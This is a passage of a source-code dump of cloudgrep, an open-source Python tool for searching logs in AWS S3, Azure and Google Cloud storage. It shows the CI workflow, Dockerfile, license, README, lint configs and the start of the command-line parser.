├── .github
    └── workflows
    │   └── app-ci.yml
├── .gitignore
├── Dockerfile
├── LICENSE
├── README.md
├── ci
    ├── black.toml
    ├── flake8.cfg
    └── mypy.cfg
├── cloudgrep.py
├── cloudgrep
    ├── __init__.py
    ├── __main__.py
    ├── cloud.py
    ├── cloudgrep.py
    ├── queries.txt
    └── search.py
├── readme
    └── Diagram.png
├── release
    ├── generate_linux_binary.sh
    ├── generate_osx_binary.sh
    └── generate_windows_binary.bat
├── requirements.txt
├── setup.cfg
├── setup.py
└── tests
    ├── __init__.py
    ├── data
        ├── 000000
        ├── 000000.gz
        ├── 000000.zip
        ├── 14_3.log
        ├── 26688_17.log
        ├── 35010_7.log
        ├── UTF-8-Test.txt
        ├── UTF-8-test_filename_ŀĔ_TH̘Ë͖́̉ ͠P̯͍̭O̚​N̐Y̡ H̸̡̪̯ͨ͊̽̅̾̎Ȩ̬̩̾͛ͪ̈́̀́͘ ̶̧̨̱̹̭̯ͧ̾ͬC̷̙̲̝͖ͭ̏ͥͮ͟Oͮ͏̮̪̝͍M̲̖͊̒ͪͩͬ̚̚͜Ȇ̴̟̟͙̞ͩ͌͝S̨̥̫͎̭ͯ̿̔̀ͅ.txt
        ├── apache_access.log
        ├── azure.json
        ├── azure_singleline.json
        ├── bad_azure.json
        ├── bad_cloudtrail.json
        ├── cloudtrail.json
        ├── cloudtrail_singleline.json
        └── yara.rule
    └── test_unit.py


/.github/workflows/app-ci.yml:
--------------------------------------------------------------------------------
  1 | name: CI
  2 | 
  3 | on:
  4 |   push:
  5 |     branches: [ "main" ]
  6 |   pull_request:
  7 |     branches: [ "main" ]
  8 | 
  9 | permissions:
 10 |   contents: read
 11 | 
 12 | jobs:
 13 |   default:
 14 |     runs-on: ubuntu-latest
 15 |     steps:
 16 |     - uses: actions/checkout@v3
 17 |     - name: Set up Python
 18 |       uses: actions/setup-python@v3
 19 |       with:
 20 |         python-version: '3.10'
 21 |     - name: Set up Environment
 22 |       run: |
 23 |         python -m pip install --upgrade pip --default-timeout=100
 24 |         pip3 install -r ./requirements.txt --default-timeout=100
 25 |     - name: Unit Tests
 26 |       run: |
 27 |         python3 -m unittest discover ./tests/
 28 |     - name: Static Checks
 29 |       run: |
 30 |         pip3 install flake8 mypy --default-timeout=100
 31 |         mypy --config-file ./ci/mypy.cfg ./
 32 |         flake8 --config ./ci/flake8.cfg
 33 |         echo If this fails run: python3 -m black . --config ./ci/black.toml
 34 |         # Skip - Behaves differently on local: python3 -m black . --config ./ci/black.toml --check
 35 |         python3 -m pip_audit -r requirements.txt
 36 | 
 37 |   compile-linux:
 38 |     runs-on: ubuntu-latest
 39 |     steps:
 40 |     - uses: actions/checkout@v3
 41 |     - name: Set up Python
 42 |       uses: actions/setup-python@v3
 43 |       with:
 44 |         python-version: '3.10'
 45 |     - name: Set up Environment
 46 |       run: |
 47 |         python -m pip install --upgrade pip --default-timeout=100
 48 |         pip3 install -r ./requirements.txt --default-timeout=100
 49 |     - name: Build & Run Binary
 50 |       run: |
 51 |         pip3 install pyinstaller
 52 |         chmod +x ./release/generate_linux_binary.sh
 53 |         ./release/generate_linux_binary.sh
 54 |         chmod +x ./dist/cloudgrep
 55 |         ./dist/cloudgrep -h # check it doesn't return non 0 exit status, i.e. crash
 56 |     - uses: actions/upload-artifact@v4
 57 |       with:
 58 |           name: dist-linux
 59 |           path: ./dist/*
 60 | 
 61 |   compile-windows:
 62 |     runs-on: windows-latest
 63 |     steps:
 64 |     - uses: actions/checkout@v3
 65 |     - name: Set up Python
 66 |       uses: actions/setup-python@v3
 67 |       with:
 68 |         python-version: '3.10'
 69 |     - name: Setup Environment
 70 |       run: |
 71 |         pip install -r ./requirements.txt
 72 |         pip install setuptools_rust
 73 |         pip install pyinstaller
 74 |     - name: Run cloudgrep Python
 75 |       run: |
 76 |         cd release
 77 |         ./generate_windows_binary.bat
 78 |         ./dist/cloudgrep.exe -h
 79 |     - uses: actions/upload-artifact@v4
 80 |       with:
 81 |           name: dist-windows
 82 |           path: ./release/dist/*
 83 | 
 84 |   compile-macos:
 85 |     runs-on: macos-15
 86 |     steps:
 87 |     - uses: actions/checkout@v3
 88 |     - name: Set up Python
 89 |       uses: actions/setup-python@v3
 90 |       with:
 91 |         python-version: '3.10'
 92 |     - name: Setup Environment
 93 |       run: |
 94 |         pip3 install -r ./requirements.txt
 95 |     - name: Run cloudgrep Python
 96 |       run: |
 97 |         pip3 install pyinstaller
 98 |         chmod +x ./release/generate_linux_binary.sh
 99 |         ./release/generate_linux_binary.sh
100 |         chmod +x ./dist/cloudgrep
101 |         ./dist/cloudgrep -h # check it doesn't return non 0 exit status, i.e. crash
102 |     - uses: actions/upload-artifact@v4
103 |       with:
104 |           name: dist-osx
105 |           path: ./dist/*
106 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | downloads/
 15 | eggs/
 16 | .eggs/
 17 | lib/
 18 | lib64/
 19 | parts/
 20 | sdist/
 21 | var/
 22 | wheels/
 23 | share/python-wheels/
 24 | *.egg-info/
 25 | .installed.cfg
 26 | *.egg
 27 | MANIFEST
 28 | 
 29 | # PyInstaller
 30 | #  Usually these files are written by a python script from a template
 31 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 32 | *.manifest
 33 | *.spec
 34 | 
 35 | # Installer logs
 36 | pip-log.txt
 37 | pip-delete-this-directory.txt
 38 | 
 39 | # Unit test / coverage reports
 40 | htmlcov/
 41 | .tox/
 42 | .nox/
 43 | .coverage
 44 | .coverage.*
 45 | .cache
 46 | nosetests.xml
 47 | coverage.xml
 48 | *.cover
 49 | *.py,cover
 50 | .hypothesis/
 51 | .pytest_cache/
 52 | cover/
 53 | 
 54 | # Translations
 55 | *.mo
 56 | *.pot
 57 | 
 58 | # Django stuff:
 59 | local_settings.py
 60 | db.sqlite3
 61 | db.sqlite3-journal
 62 | 
 63 | # Flask stuff:
 64 | instance/
 65 | .webassets-cache
 66 | 
 67 | # Scrapy stuff:
 68 | .scrapy
 69 | 
 70 | # Sphinx documentation
 71 | docs/_build/
 72 | 
 73 | # PyBuilder
 74 | .pybuilder/
 75 | target/
 76 | 
 77 | # Jupyter Notebook
 78 | .ipynb_checkpoints
 79 | 
 80 | # IPython
 81 | profile_default/
 82 | ipython_config.py
 83 | 
 84 | # pyenv
 85 | #   For a library or package, you might want to ignore these files since the code is
 86 | #   intended to run in multiple environments; otherwise, check them in:
 87 | # .python-version
 88 | 
 89 | # pipenv
 90 | #   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
 91 | #   However, in case of collaboration, if having platform-specific dependencies or dependencies
 92 | #   having no cross-platform support, pipenv may install dependencies that don't work, or not
 93 | #   install all needed dependencies.
 94 | #Pipfile.lock
 95 | 
 96 | # poetry
 97 | #   Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
 98 | #   This is especially recommended for binary packages to ensure reproducibility, and is more
 99 | #   commonly ignored for libraries.
100 | #   https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
101 | #poetry.lock
102 | 
103 | # pdm
104 | #   Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
105 | #pdm.lock
106 | #   pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
107 | #   in version control.
108 | #   https://pdm.fming.dev/#use-with-ide
109 | .pdm.toml
110 | 
111 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
112 | __pypackages__/
113 | 
114 | # Celery stuff
115 | celerybeat-schedule
116 | celerybeat.pid
117 | 
118 | # SageMath parsed files
119 | *.sage.py
120 | 
121 | # Environments
122 | .env
123 | .venv
124 | env/
125 | venv/
126 | ENV/
127 | env.bak/
128 | venv.bak/
129 | 
130 | # Spyder project settings
131 | .spyderproject
132 | .spyproject
133 | 
134 | # Rope project settings
135 | .ropeproject
136 | 
137 | # mkdocs documentation
138 | /site
139 | 
140 | # mypy
141 | .mypy_cache/
142 | .dmypy.json
143 | dmypy.json
144 | 
145 | # Pyre type checker
146 | .pyre/
147 | 
148 | # pytype static type analyzer
149 | .pytype/
150 | 
151 | # Cython debug symbols
152 | cython_debug/
153 | 
154 | # PyCharm
155 | #  JetBrains specific template is maintained in a separate JetBrains.gitignore that can
156 | #  be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
157 | #  and can be added to the global gitignore or merged into this file.  For a more nuclear
158 | #  option (not recommended) you can uncomment the following to ignore the entire idea folder.
159 | #.idea/
160 | 
161 | queries.txt
162 | .vscode/settings.json
163 | valid_file.txt
164 | small.log
165 | 


--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM python:latest
 2 | 
 3 | RUN apt update && \
 4 |       apt install -y git && \
 5 |       useradd -m cloudgrep && \
 6 |       chown -R cloudgrep: /home/cloudgrep
 7 | 
 8 | USER cloudgrep
 9 | WORKDIR /home/cloudgrep
10 | 
11 | RUN cd /home/cloudgrep && \
12 |       git clone https://github.com/cado-security/cloudgrep.git && \
13 |       cd cloudgrep && \
14 |       pip install -r requirements.txt
15 | 
16 | ENTRYPOINT ["python3", "/home/cloudgrep/cloudgrep/cloudgrep.py"]
17 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 |                                  Apache License
  2 |                            Version 2.0, January 2004
  3 |                         http://www.apache.org/licenses/
  4 | 
  5 |    TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
  6 | 
  7 |    1. Definitions.
  8 | 
  9 |       "License" shall mean the terms and conditions for use, reproduction,
 10 |       and distribution as defined by Sections 1 through 9 of this document.
 11 | 
 12 |       "Licensor" shall mean the copyright owner or entity authorized by
 13 |       the copyright owner that is granting the License.
 14 | 
 15 |       "Legal Entity" shall mean the union of the acting entity and all
 16 |       other entities that control, are controlled by, or are under common
 17 |       control with that entity. For the purposes of this definition,
 18 |       "control" means (i) the power, direct or indirect, to cause the
 19 |       direction or management of such entity, whether by contract or
 20 |       otherwise, or (ii) ownership of fifty percent (50%) or more of the
 21 |       outstanding shares, or (iii) beneficial ownership of such entity.
 22 | 
 23 |       "You" (or "Your") shall mean an individual or Legal Entity
 24 |       exercising permissions granted by this License.
 25 | 
 26 |       "Source" form shall mean the preferred form for making modifications,
 27 |       including but not limited to software source code, documentation
 28 |       source, and configuration files.
 29 | 
 30 |       "Object" form shall mean any form resulting from mechanical
 31 |       transformation or translation of a Source form, including but
 32 |       not limited to compiled object code, generated documentation,
 33 |       and conversions to other media types.
 34 | 
 35 |       "Work" shall mean the work of authorship, whether in Source or
 36 |       Object form, made available under the License, as indicated by a
 37 |       copyright notice that is included in or attached to the work
 38 |       (an example is provided in the Appendix below).
 39 | 
 40 |       "Derivative Works" shall mean any work, whether in Source or Object
 41 |       form, that is based on (or derived from) the Work and for which the
 42 |       editorial revisions, annotations, elaborations, or other modifications
 43 |       represent, as a whole, an original work of authorship. For the purposes
 44 |       of this License, Derivative Works shall not include works that remain
 45 |       separable from, or merely link (or bind by name) to the interfaces of,
 46 |       the Work and Derivative Works thereof.
 47 | 
 48 |       "Contribution" shall mean any work of authorship, including
 49 |       the original version of the Work and any modifications or additions
 50 |       to that Work or Derivative Works thereof, that is intentionally
 51 |       submitted to Licensor for inclusion in the Work by the copyright owner
 52 |       or by an individual or Legal Entity authorized to submit on behalf of
 53 |       the copyright owner. For the purposes of this definition, "submitted"
 54 |       means any form of electronic, verbal, or written communication sent
 55 |       to the Licensor or its representatives, including but not limited to
 56 |       communication on electronic mailing lists, source code control systems,
 57 |       and issue tracking systems that are managed by, or on behalf of, the
 58 |       Licensor for the purpose of discussing and improving the Work, but
 59 |       excluding communication that is conspicuously marked or otherwise
 60 |       designated in writing by the copyright owner as "Not a Contribution."
 61 | 
 62 |       "Contributor" shall mean Licensor and any individual or Legal Entity
 63 |       on behalf of whom a Contribution has been received by Licensor and
 64 |       subsequently incorporated within the Work.
 65 | 
 66 |    2. Grant of Copyright License. Subject to the terms and conditions of
 67 |       this License, each Contributor hereby grants to You a perpetual,
 68 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 69 |       copyright license to reproduce, prepare Derivative Works of,
 70 |       publicly display, publicly perform, sublicense, and distribute the
 71 |       Work and such Derivative Works in Source or Object form.
 72 | 
 73 |    3. Grant of Patent License. Subject to the terms and conditions of
 74 |       this License, each Contributor hereby grants to You a perpetual,
 75 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 76 |       (except as stated in this section) patent license to make, have made,
 77 |       use, offer to sell, sell, import, and otherwise transfer the Work,
 78 |       where such license applies only to those patent claims licensable
 79 |       by such Contributor that are necessarily infringed by their
 80 |       Contribution(s) alone or by combination of their Contribution(s)
 81 |       with the Work to which such Contribution(s) was submitted. If You
 82 |       institute patent litigation against any entity (including a
 83 |       cross-claim or counterclaim in a lawsuit) alleging that the Work
 84 |       or a Contribution incorporated within the Work constitutes direct
 85 |       or contributory patent infringement, then any patent licenses
 86 |       granted to You under this License for that Work shall terminate
 87 |       as of the date such litigation is filed.
 88 | 
 89 |    4. Redistribution. You may reproduce and distribute copies of the
 90 |       Work or Derivative Works thereof in any medium, with or without
 91 |       modifications, and in Source or Object form, provided that You
 92 |       meet the following conditions:
 93 | 
 94 |       (a) You must give any other recipients of the Work or
 95 |           Derivative Works a copy of this License; and
 96 | 
 97 |       (b) You must cause any modified files to carry prominent notices
 98 |           stating that You changed the files; and
 99 | 
100 |       (c) You must retain, in the Source form of any Derivative Works
101 |           that You distribute, all copyright, patent, trademark, and
102 |           attribution notices from the Source form of the Work,
103 |           excluding those notices that do not pertain to any part of
104 |           the Derivative Works; and
105 | 
106 |       (d) If the Work includes a "NOTICE" text file as part of its
107 |           distribution, then any Derivative Works that You distribute must
108 |           include a readable copy of the attribution notices contained
109 |           within such NOTICE file, excluding those notices that do not
110 |           pertain to any part of the Derivative Works, in at least one
111 |           of the following places: within a NOTICE text file distributed
112 |           as part of the Derivative Works; within the Source form or
113 |           documentation, if provided along with the Derivative Works; or,
114 |           within a display generated by the Derivative Works, if and
115 |           wherever such third-party notices normally appear. The contents
116 |           of the NOTICE file are for informational purposes only and
117 |           do not modify the License. You may add Your own attribution
118 |           notices within Derivative Works that You distribute, alongside
119 |           or as an addendum to the NOTICE text from the Work, provided
120 |           that such additional attribution notices cannot be construed
121 |           as modifying the License.
122 | 
123 |       You may add Your own copyright statement to Your modifications and
124 |       may provide additional or different license terms and conditions
125 |       for use, reproduction, or distribution of Your modifications, or
126 |       for any such Derivative Works as a whole, provided Your use,
127 |       reproduction, and distribution of the Work otherwise complies with
128 |       the conditions stated in this License.
129 | 
130 |    5. Submission of Contributions. Unless You explicitly state otherwise,
131 |       any Contribution intentionally submitted for inclusion in the Work
132 |       by You to the Licensor shall be under the terms and conditions of
133 |       this License, without any additional terms or conditions.
134 |       Notwithstanding the above, nothing herein shall supersede or modify
135 |       the terms of any separate license agreement you may have executed
136 |       with Licensor regarding such Contributions.
137 | 
138 |    6. Trademarks. This License does not grant permission to use the trade
139 |       names, trademarks, service marks, or product names of the Licensor,
140 |       except as required for reasonable and customary use in describing the
141 |       origin of the Work and reproducing the content of the NOTICE file.
142 | 
143 |    7. Disclaimer of Warranty. Unless required by applicable law or
144 |       agreed to in writing, Licensor provides the Work (and each
145 |       Contributor provides its Contributions) on an "AS IS" BASIS,
146 |       WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 |       implied, including, without limitation, any warranties or conditions
148 |       of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 |       PARTICULAR PURPOSE. You are solely responsible for determining the
150 |       appropriateness of using or redistributing the Work and assume any
151 |       risks associated with Your exercise of permissions under this License.
152 | 
153 |    8. Limitation of Liability. In no event and under no legal theory,
154 |       whether in tort (including negligence), contract, or otherwise,
155 |       unless required by applicable law (such as deliberate and grossly
156 |       negligent acts) or agreed to in writing, shall any Contributor be
157 |       liable to You for damages, including any direct, indirect, special,
158 |       incidental, or consequential damages of any character arising as a
159 |       result of this License or out of the use or inability to use the
160 |       Work (including but not limited to damages for loss of goodwill,
161 |       work stoppage, computer failure or malfunction, or any and all
162 |       other commercial damages or losses), even if such Contributor
163 |       has been advised of the possibility of such damages.
164 | 
165 |    9. Accepting Warranty or Additional Liability. While redistributing
166 |       the Work or Derivative Works thereof, You may choose to offer,
167 |       and charge a fee for, acceptance of support, warranty, indemnity,
168 |       or other liability obligations and/or rights consistent with this
169 |       License. However, in accepting such obligations, You may act only
170 |       on Your own behalf and on Your sole responsibility, not on behalf
171 |       of any other Contributor, and only if You agree to indemnify,
172 |       defend, and hold each Contributor harmless for any liability
173 |       incurred by, or claims asserted against, such Contributor by reason
174 |       of your accepting any such warranty or additional liability.
175 | 
176 |    END OF TERMS AND CONDITIONS
177 | 
178 |    APPENDIX: How to apply the Apache License to your work.
179 | 
180 |       To apply the Apache License to your work, attach the following
181 |       boilerplate notice, with the fields enclosed by brackets "[]"
182 |       replaced with your own identifying information. (Don't include
183 |       the brackets!)  The text should be enclosed in the appropriate
184 |       comment syntax for the file format. We also recommend that a
185 |       file or class name and description of purpose be included on the
186 |       same "printed page" as the copyright notice for easier
187 |       identification within third-party archives.
188 | 
189 |    Copyright [yyyy] [name of copyright owner]
190 | 
191 |    Licensed under the Apache License, Version 2.0 (the "License");
192 |    you may not use this file except in compliance with the License.
193 |    You may obtain a copy of the License at
194 | 
195 |        http://www.apache.org/licenses/LICENSE-2.0
196 | 
197 |    Unless required by applicable law or agreed to in writing, software
198 |    distributed under the License is distributed on an "AS IS" BASIS,
199 |    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 |    See the License for the specific language governing permissions and
201 |    limitations under the License.
202 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # cloudgrep #
  2 | cloudgrep searches cloud storage.
  3 | 
  4 | ![ci](https://github.com/cado-security/cloudgrep/actions/workflows/app-ci.yml/badge.svg?branch=main) [![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
  5 | 
  6 | 
  7 | It currently supports searching log files, optionally compressed with gzip (.gz) or zip (.zip), in AWS S3, Azure Storage or Google Cloud Storage.
  8 | 
  9 | ![Diagram](readme/Diagram.png "Diagram")
 10 | 
 11 | ### Why? ###
 12 | - Directly searching cloud storage, without indexing logs into a SIEM or Log Analysis tool, can be faster and cheaper.
 13 | - There is no need to wait for logs to be ingested, indexed, and made available for searching.
 14 | - It searches files in parallel for speed.
 15 | - This may be of use when debugging applications, or investigating a security incident.
 16 | 
 17 | ### Example ###
 18 | 
 19 | Simple example:
 20 | ```
 21 | ./cloudgrep --bucket test-s3-access-logs --query 9RXXKPREHHTFQD77
 22 | python3 cloudgrep.py -b test-s3-access-logs -q 9RXXKPREHHTFQD77
 23 | ```
 24 | 
 25 | Simple Azure example:
 26 | ```
 27 | python3 cloudgrep.py -an some_account -cn some_container -q my_search
 28 | ```
 29 | 
 30 | Simple Google example:
 31 | ```
 32 | python3 cloudgrep.py -gb my-gcp-bucket -q my_search
 33 | ```
 34 | 
 35 | Simple CloudTrail log example, outputting results as JSON:
 36 | ```
 37 | python3 cloudgrep.py -b test-s3-access-logs -q 9RXXKPREHHTFQD77 -lt cloudtrail -jo
 38 | ```
 39 | 
 40 | Simple custom log example:
 41 | ```
 42 | python3 cloudgrep.py -b test-s3-access-logs -q 9RXXKPREHHTFQD77 -lf json -lp Records
 43 | ```
 44 | 
 45 | More complicated example:
 46 | ```
 47 | python3 cloudgrep.py -b test-s3-access-logs --prefix "logs/" --filename ".log" -q 9RXXKPREHHTFQD77 -s "2023-01-09 20:30:00" -e "2023-01-09 20:45:00" --file_size 10000 --debug
 48 | ```
 49 | 
 50 | Saving the output to a file:
 51 | ```
 52 | python3 cloudgrep.py -b test-s3-access-logs -q 9RXXKPREHHTFQD77 --hide_filenames > matching_events.log
 53 | ```
 54 | 
 55 | Example output:
 56 | ```
 57 | [2023-11-30 13:37:12,416] - Bucket is in region: us-east-2 : Search from the same region to avoid egress charges.
 58 | [2023-11-30 13:37:12,417] - Searching 11 files in test-s3-access-logs for 9RXXKPREHHTFQD77...
 59 | {"key_name": "access2023-01-09-20-34-20-EAC533CB93B4ACBE", "line": "abbd82b5ad5dc5d024cd1841d19c0cf2fd7472c47a1501ececde37fe91adc510 bucket-72561-s3bucketalt-1my9piwesfim7 [09/Jan/2023:19:20:00 +0000] 1.125.222.333 arn:aws:sts::000011110470:assumed-role/bucket-72561-myResponseRole-1WP2IOKDV7B4Y/1673265251.340187 9RXXKPREHHTFQD77 REST.GET.BUCKET - \"GET /?list-type=2&prefix=-collector%2Fproject-&start-after=&encoding-type=url HTTP/1.1\" 200 - 946 - 33 32 \"-\" \"Boto3/1.21.24 Python/3.9.2 Linux/5.10.0-10-cloud-amd64 Botocore/1.24.46\" - aNPuHKw== SigV4 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader bucket-72561-s3bucketalt-1my9piwesfim7.s3.us-east-2.amazonaws.com TLSv1.2 - -"}
 60 | ```
 61 | 
 62 | ### Arguments ###
 63 | ```
 64 | usage: cloudgrep.py [-h] [-b BUCKET] [-an ACCOUNT_NAME] [-cn CONTAINER_NAME] [-gb GOOGLE_BUCKET] [-q QUERY]
 65 |                     [-v FILE] [-y YARA] [-p PREFIX] [-f FILENAME] [-s START_DATE] [-e END_DATE]
 66 |                     [-fs FILE_SIZE] [-pr PROFILE] [-d] [-hf] [-lt LOG_TYPE] [-lf LOG_FORMAT]
 67 |                     [-lp LOG_PROPERTIES] [-jo JSON_OUTPUT]
 68 | 
 69 | CloudGrep searches is grep for cloud storage like S3 and Azure Storage. Version: 1.0.5
 70 | 
 71 | options:
 72 |   -h, --help            show this help message and exit
 73 |   -b BUCKET, --bucket BUCKET
 74 |                         AWS S3 Bucket to search. E.g. my-bucket
 75 |   -an ACCOUNT_NAME, --account-name ACCOUNT_NAME
 76 |                         Azure Account Name to Search
 77 |   -cn CONTAINER_NAME, --container-name CONTAINER_NAME
 78 |                         Azure Container Name to Search
 79 |   -gb GOOGLE_BUCKET, --google-bucket GOOGLE_BUCKET
 80 |                         Google Cloud Bucket to Search
 81 |   -q QUERY, --query QUERY
 82 |                         Text to search for. Will be parsed as a Regex. E.g. example.com
 83 |   -v FILE, --file FILE  File containing a list of words or regular expressions to search for. One per line.
 84 |   -y YARA, --yara YARA  File containing Yara rules to scan files.
 85 |   -p PREFIX, --prefix PREFIX
 86 |                         Optionally filter on the start of the Object name. E.g. logs/
 87 |   -f FILENAME, --filename FILENAME
 88 |                         Optionally filter on Objects that match a keyword. E.g. .log.gz
 89 |   -s START_DATE, --start_date START_DATE
 90 |                         Optionally filter on Objects modified after a Date or Time. E.g. 2022-01-01
 91 |   -e END_DATE, --end_date END_DATE
 92 |                         Optionally filter on Objects modified before a Date or Time. E.g. 2022-01-01
 93 |   -fs FILE_SIZE, --file_size FILE_SIZE
 94 |                         Optionally filter on Objects smaller than a file size, in bytes. Defaults to 100 Mb.
 95 |   -pr PROFILE, --profile PROFILE
 96 |                         Set an AWS profile to use. E.g. default, dev, prod.
 97 |   -d, --debug           Enable Debug logging.
 98 |   -hf, --hide_filenames
 99 |                         Dont show matching filenames.
100 |   -lt LOG_TYPE, --log_type LOG_TYPE
101 |                         Return individual matching log entries based on pre-defined log types, otherwise
102 |                         custom log_format and log_properties can be used. E.g. cloudtrail.
103 |   -lf LOG_FORMAT, --log_format LOG_FORMAT
104 |                         Define custom log format of raw file to parse before applying search logic. Used if
105 |                         --log_type is not defined. E.g. json.
106 |   -lp LOG_PROPERTIES, --log_properties LOG_PROPERTIES
107 |                         Define custom list of properties to traverse to dynamically extract final list of log
108 |                         records. Used if --log_type is not defined. E.g. [Records].
109 |   -jo JSON_OUTPUT, --json_output JSON_OUTPUT
110 |                         Output as JSON.
111 | 
112 | ```
113 | 
114 | ### Deployment ###
115 | 
116 | Install with:
117 | ``` pip3 install -r requirements.txt ```
118 | Or download the latest compiled release [here](https://github.com/cado-security/cloudgrep/releases/tag/Latest)
119 | 
120 | You can run this from your local laptop, or from a virtual machine in your cloud provider.
121 | 
122 | This requires python3.10 or later
123 | 
124 | #### Docker ####
125 | 
126 | Build with:
127 | ``` docker build -t cloudgrep . ```
128 | 
129 | Run with:
130 | ``` docker run --rm -ti cloudgrep ```
131 | 
132 | To pass environment variables, e.g. for AWS:
133 | ``` docker run --rm  --env-file <(env|grep AWS) -ti cloudgrep```
134 | 
135 | ### Running in your Cloud and Authentication ###
136 | 
137 | #### AWS ####
138 | Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to [configure the AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html).
139 | If you are running on an EC2, an [Instance Profile](https://devopscube.com/aws-iam-role-instance-profile/) is likely the best choice.
140 | 
141 | If you run on an EC2 instance in the same region as the S3 bucket with a [VPC endpoint for S3](https://aws.amazon.com/blogs/architecture/overview-of-data-transfer-costs-for-common-architectures/) you can [avoid egress charges](https://awsmadeeasy.com/blog/aws-s3-vpc-endpoint-transfer-cost-reduction/).
142 | You can authenticate in a [number of ways](https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html).
143 | 
144 | #### Azure ####
145 | The simplest way to authenticate with Azure is to first run:
146 | ```
147 | az login
148 | ```
149 | This will open a browser window and prompt you to login to Azure.
150 | 
151 | #### GCP ####
152 | You will need to create a service account and download the credentials file then set with:
153 | ```
154 | export GOOGLE_APPLICATION_CREDENTIALS="/Users/creds.json"
155 | ```
156 | 
157 | ### Contributions ###
158 | We welcome any contributions to this project! Please add via a Pull Request.
159 | 
160 | Possible future work could include:
161 | - Support for zstd compression
162 | - Log parsing and detection using grok patterns, Sigma, Yara or a file of Regex queries
163 | - Export parsed logs in a standard syslog format
164 | 
165 | ### Help ###
166 | Please open a GitHub issue if you have any questions or suggestions.
167 | This is not an officially supported [Cado Security](https://www.cadosecurity.com/) product.
168 | 


--------------------------------------------------------------------------------
/ci/black.toml:
--------------------------------------------------------------------------------
1 | [tool.black]
2 | 
3 | line-length = 120
4 | 


--------------------------------------------------------------------------------
/ci/flake8.cfg:
--------------------------------------------------------------------------------
 1 | [flake8]
 2 | # Maximium cyclomatic complexity
 3 | max-complexity = 20
 4 | exclude = s3cmd,efs-utils,generated
 5 | select = 
 6 |     F,
 7 |     B,
 8 |     T,
 9 |     S,
10 | ignore = 
11 |     # Line too long
12 |     E501,
13 |     # unexpected spaces around keyword / parameter equals
14 |     E251,
15 |     # too many leading '#' for block comment
16 |     E266,
17 |     # blank line contains whitespace
18 |     W293,
19 |     # expected 2 blank lines, found 1
20 |     E302,
21 |     # at least two spaces before inline comment
22 |     E261,
23 |     # whitespace before ']'
24 |     E202,
25 |     # whitespace after '['
26 |     E201,
27 |     # trailing whitespace
28 |     W291,
29 |     # whitespace before :
30 |     E203,
31 |     # block comment should start with '# '
32 |     E265,
33 |     # too many blank lines (2)
34 |     E303,
35 |     # missing whitespace around operator
36 |     E225,
37 |     # line break before binary operator
38 |     W503,
39 |     # insecure use of temp file/dir, noisy and not a big deal for us
40 |     S108,
41 |     # need to allow subprocess
42 |     S404,
43 |     # need to allow subprocess
44 |     S603,
45 |     # Unable to detect undefined names due to * import
46 |     F403,
47 | application_import_names = core,tests
48 | import-order-style=pep8


--------------------------------------------------------------------------------
/ci/mypy.cfg:
--------------------------------------------------------------------------------
 1 | [mypy]
 2 | show_column_numbers = True
 3 | follow_imports = silent
 4 | disallow_untyped_defs = True
 5 | exclude = binaries
 6 | 
 7 | [mypy-timeout_decorator]
 8 | ignore_missing_imports = True
 9 | 
10 | 
11 | [mypy-moto]
12 | ignore_missing_imports = True
13 | 


--------------------------------------------------------------------------------
/cloudgrep.py:
--------------------------------------------------------------------------------
1 | from cloudgrep import __main__
2 | 
3 | __main__.main()
4 | 


--------------------------------------------------------------------------------
/cloudgrep/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cado-security/cloudgrep/7f22e3a4f7131d6ecc7693197a2cd78186147278/cloudgrep/__init__.py


--------------------------------------------------------------------------------
/cloudgrep/__main__.py:
--------------------------------------------------------------------------------
 1 | import argparse
 2 | import logging
 3 | import sys
 4 | from typing import List, Optional
 5 | import dateutil.parser
 6 | import datetime
 7 | 
 8 | from cloudgrep.cloudgrep import CloudGrep
 9 | 
10 | VERSION = "1.0.5"
11 | 
12 | 
13 | def list_of_strings(arg: str) -> List[str]:
14 |     """Parse a comma‐separated string into a list of nonempty strings."""
15 |     return [s.strip() for s in arg.split(",") if s.strip()]
16 | 
17 | 
18 | def main() -> None:
19 |     parser = argparse.ArgumentParser(
20 |         description=f"CloudGrep: grep for cloud storage (S3, Azure, Google Cloud). Version: {VERSION}"
21 |     )
22 |     parser.add_argument("-b", "--bucket", help="AWS S3 Bucket to search (e.g. my-bucket)")
23 |     parser.add_argument("-an", "--account-name", help="Azure Account Name to search")
24 |     parser.add_argument("-cn", "--container-name", help="Azure Container Name to search")
25 |     parser.add_argument("-gb", "--google-bucket", help="Google Cloud Bucket to search")
26 |     parser.add_argument("-q", "--query", type=list_of_strings, help="Comma-separated list of regex patterns to search")
27 |     parser.add_argument("-v", "--file", help="File containing queries (one per line)")
28 |     parser.add_argument("-y", "--yara", help="File containing Yara rules")
29 |     parser.add_argument("-p", "--prefix", default="", help="Filter objects by prefix (e.g. logs/)")
